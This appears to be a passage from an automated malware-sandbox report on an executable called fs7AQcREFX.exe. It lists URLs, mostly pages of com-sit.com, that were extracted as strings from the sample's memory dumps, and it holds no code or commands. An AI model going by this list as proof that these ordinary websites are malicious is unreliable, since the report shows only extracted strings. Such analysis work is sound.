                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/whois.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.c9dd.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513206122.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397997118.0000000003600000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/administration/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/agb/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/asien/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/blog/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/branchen-know-how/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/central-warehouse-seite/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/central-warehouse/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/code-of-conducts/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/comments/feed/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/consigment-pakete/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/consignment/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/content-supply-management/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/datenschutz/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/decapsulating/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/direktvermarktung/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/diversity/
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/en/start-english/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/europa/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 